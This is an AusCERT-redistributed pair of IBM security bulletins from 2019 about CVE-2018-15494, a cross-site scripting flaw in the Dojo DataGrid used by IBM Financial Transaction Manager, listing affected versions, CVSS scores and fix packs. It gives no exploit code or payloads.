Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2019.2916.2
Financial Transaction Manager for Digital Payments is affected by a
potential cross-site scripting (XSS) vulnerability (CVE-2018-15494)
13 August 2019
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Financial Transaction Manager
Publisher: IBM
Operating System: Windows
UNIX variants (UNIX, Linux, OSX)
Impact/Access: Cross-site Scripting -- Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2018-15494
Reference: ESB-2019.2889
ESB-2019.2380
ESB-2019.1481
ESB-2018.2610
Original Bulletin:
https://www.ibm.com/support/docview.wss?uid=ibm10795504
https://www.ibm.com/support/docview.wss?uid=ibm10795518
Comment: This bulletin contains two (2) IBM security advisories.
Revision History: August 13 2019: Added advisory for FTM for Check Services
August 5 2019: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
Financial Transaction Manager for Digital Payments is affected by a potential
cross-site scripting (XSS) vulnerability (CVE-2018-15494)
Product: Financial Transaction Manager
Component: Financial Transaction Manager for Digital Payments
Software version: 3.2.0, 3.2.2
Operating system(s): Platform Independent
Reference #: 0795504
Security Bulletin
Summary
Financial Transaction Manager for Digital Payments (FTM DP) for Multi-Platform
has addressed the following vulnerability. A potential cross-site scripting
vulnerability allows users to embed arbitrary JavaScript code in the Web UI
thus altering the intended functionality potentially leading to credentials
disclosure within a trusted session.
Vulnerability Details
CVEID: CVE-2018-15494
DESCRIPTION: Dojo Toolkit is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input by the DataGrid component. A remote
attacker could exploit this vulnerability to inject malicious script into a Web
page which would be executed in a victim's Web browser within the security
context of the hosting Web site, once the page is viewed. An attacker could use
this vulnerability to steal the victim's cookie-based authentication
credentials.
CVSS Base Score: 6.1
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/
148556 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Affected Products and Versions
FTM DP v3.2.0.0 - v3.2.0.1, v3.2.2.0
Remediation/Fixes
Product VRMF APAR Remediation/First Fix
3.2.0.0,
FTM DP 3.2.0.1 PH07369 3.2.0.1-FTM-DP-MP-iFix0002
FTM DP 3.2.2.0 PH07369 3.2.2.0-FTM-DP-MP-iFix0003
Workarounds and Mitigations
None
Change History
2 August 2019: Original version published
Product Alias/Synonym
FTM
FTM DP
- --------------------------------------------------------------------------------
Security Bulletin: Financial Transaction Manager for Check Services is affected
by a potential cross-site scripting (XSS) vulnerability (CVE-2018-15494)
Document information
Component: Financial Transaction Manager for Check Services
Software version: 3.0.5
Operating system(s): Platform Independent
Reference #: 0795518
Modified date: 12 August 2019
Summary
IBM Financial Transaction Manager for Check Services (FTM CHK) for
Multi-Platform has addressed the following vulnerability. A potential
cross-site scripting vulnerability allows users to embed arbitrary JavaScript
code in the Web UI thus altering the intended functionality potentially leading
to credentials disclosure within a trusted session.
Vulnerability Details
CVEID: CVE-2018-15494
DESCRIPTION: Dojo Toolkit is vulnerable to cross-site scripting, caused by
improper validation of user-supplied input by the DataGrid component. A remote
attacker could exploit this vulnerability to inject malicious script into a Web
page which would be executed in a victim's Web browser within the security
context of the hosting Web site, once the page is viewed. An attacker could use
this vulnerability to steal the victim's cookie-based authentication
credentials.
CVSS Base Score: 6.1
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/
148556 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Affected Products and Versions
FTM CHK v3.0.5.0 - 3.0.5.3
Remediation/Fixes
Product VRMF APAR Remediation/First Fix
3.0.5.0
-
FTM CHK 3.0.5.3 PH07373 3.0.5-FTM-Check-MP-fp0004
Workarounds and Mitigations
None
Change History
12 August 2019: Original version published
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBXVH+d2aOgq3Tt24GAQjqpw//ZCxI7Wn856heCroHmr7fDyCkmIHViXZT
Dv7UzMdc4q4v7+FtPrbzxkdjz8KNRZZR+gzDHTaUtXjJbFkOpvg0D9mKChP8ER7F
EBxCiGNZNtJAIqbkAnrZCV71iMxLjNIIOdr/w6eXW6bCJAxbP2UdZTPttb8fLcdL
6W3IVe6p5dpvZldqlGV7oLnImptHnsxJpuhHWq5IX/UlJme/WGGRNUrqhoyp+2Mk
TS+9g0k99ScPKolOeVD0G24+K6OQeQHOyHK8MHUJPSfc1VKaJwZX6i2LsQBwZmWv
z8GFdCKLBdwe4G0o1sZuD76lSPCVbt7zxYvVJFlAmmWRYl18rPNF5yJCDk26SgGb
o8BePXiIWtBBZpzdkH/ZyRJ62RUZLmfzKeEGX2MMroZMkrVzZ9jRf5Hsi5ZKb8vp
luNSu8fPBPR4rSctEpOSN2/ddRhtDhFXHpGAuPkcHwxBiT+t8fTyoyJbw8L08tO1
iruShM+s3mVYdck4YELOMQUt9dVZIH3GQVlwsFMdJ068In/aXj25PqPwx4rRK6YE
iW9zUq3ZPduS6Ena/P3D2YmcC2BRk6SN9Il4lgpIKoncYD9h8kbbP8on5P7Dmgvw
exxlQ/G5VoxPBAdnz9Ldqxp5LAxZ0eOrIjk01ob4nVIn4qCC8fcE3xgPyChDIAKk
J9M3UqlmKF0=
=ZGd1
-----END PGP SIGNATURE-----